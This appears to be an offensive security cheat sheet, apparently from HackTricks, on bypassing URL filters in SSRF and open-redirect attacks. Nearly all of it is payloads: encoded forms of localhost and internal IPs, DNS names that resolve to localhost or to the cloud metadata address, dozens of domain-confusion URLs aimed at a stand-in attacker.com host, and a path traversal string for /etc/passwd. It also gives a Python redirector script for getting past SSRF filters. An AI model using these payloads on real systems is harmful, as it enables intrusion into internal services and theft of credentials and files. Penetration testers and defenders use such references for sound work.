Bypass URL Filtration

Localhost

# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
http://0
http:@0/ --> http://localhost/
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001

# Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1

GitHub - e1abrador/Burp-Encode-IP: Burp Suite extension to encode an IP address focused to bypass application IP / domain blacklist.GitHub

Domain Parser

https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
http://169.254.1698.254\@attacker.com
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ

① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Domain Confusion

https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com%25%32%33@{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\{domain}/
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\@{domain}
https://attacker{domain}
https://attacker.com\anything@{domain}/
https://attacker.com/.{domain]
https://attakcer.com\[{domain}]
https://attacker.com%ff@{DOMAIN}%2F
https://attacker.com%bf:@{domain}%2F
https://attacker.com%252f@{domain}%2F
https://attackjer.com%0a%2523.{domain}
https://attacker.com://{domain}
androideeplink://attacker.com\@{domain}
androideeplink://a@{domain}:@attacker.com
androideeplink://{domain}
https://{domain}.attacker.com\@{domain}
https://{domain}%252f@attacker.com%2fpath%2f%3
//attacker.com:%252525252f@{domain}
/%09/attacker.com
attacker.com%09{domain}
attacker.com\u0000@{domain}
attacker.com%00{domain}
/\attacker.com
https://attacker.comğ.{domain}
https://attacker.com\udfff@{domain} 
https://attacker.com?.{domain}
https://evil.com/test@example.com
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com

#Parameter pollution
next={domain}&next=attacker.com

Paths and Extensions Bypass

https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path
../../../etc/passwd%00.png

Bypassing IP Regex Using Automated Tools

Till REcollapse - 0xacb

This technique has been presented on BSidesLisbon 2022

Blog post: https://0xacb.com/2022/11/21/recollapse/

Slides:

• nahamcon_2022_eu_till_recollapse.pdf

• bsideslisbon_2022_till_recollapse.pdf

Videos:

• NahamCon 2022 EU

• BSidesLisbon 2022

Normalization table: https://0xacb.com/normalization_table

This script demonstrates a technique to bypass SSRF filters using an HTTP redirect. Here's a summary and explanation:

Bypass via redirect

#!/usr/bin/env python3

#python3 ./redirector.py 8000 http://127.0.0.1/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit()

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_response(302)
       self.send_header('Location', sys.argv[2])
       self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Explanation:

• Problem: Some servers filter SSRF attempts by checking the URL parameters in requests. For example, a server might block direct requests to internal IP addresses or certain protocols.

• Bypass Idea: The server might not filter the redirected response from an external server, allowing the attacker to indirectly access restricted IPs or protocols.

How It Works:

• The Python script creates a simple HTTP server that listens on a specified port.

• When the server receives a GET request, it responds with a 302 redirect status, pointing to a URL passed as an argument.

• This redirect can point to an internal IP address (e.g., 127.0.0.1) or use a protocol that might otherwise be blocked (e.g., gopher).

Usage:

1. Run the Script: Start the Python server with the desired port and the target URL for redirection:

   python3 redirector.py 8000 http://127.0.0.1/

2. Trigger SSRF: Send an SSRF request to the vulnerable server with the URL of the Python server. The vulnerable server will follow the redirect, potentially bypassing the filter and accessing the internal resource.

Resource:

Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo MailMedium

Blackslash-trick

The backslash-trick exploits a difference between the WHATWG URL Standard and RFC3986. While RFC3986 is a general framework for URIs, WHATWG is specific to web URLs and is adopted by modern browsers. The key distinction lies in the WHATWG standard's recognition of the backslash (\) as equivalent to the forward slash (/), impacting how URLs are parsed, specifically marking the transition from the hostname to the path in a URL.

URL Standard

RFC 3986: Uniform Resource Identifier (URI): Generic SyntaxIETF Datatracker

Other Resources

Exploiting URL Parsing ConfusionClaroty

AlbusSec:- Penetration-List 08 Server-Side-Request-Forgery(SSRF)  — SampleMedium

PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

URL Format Bypass | HackTricks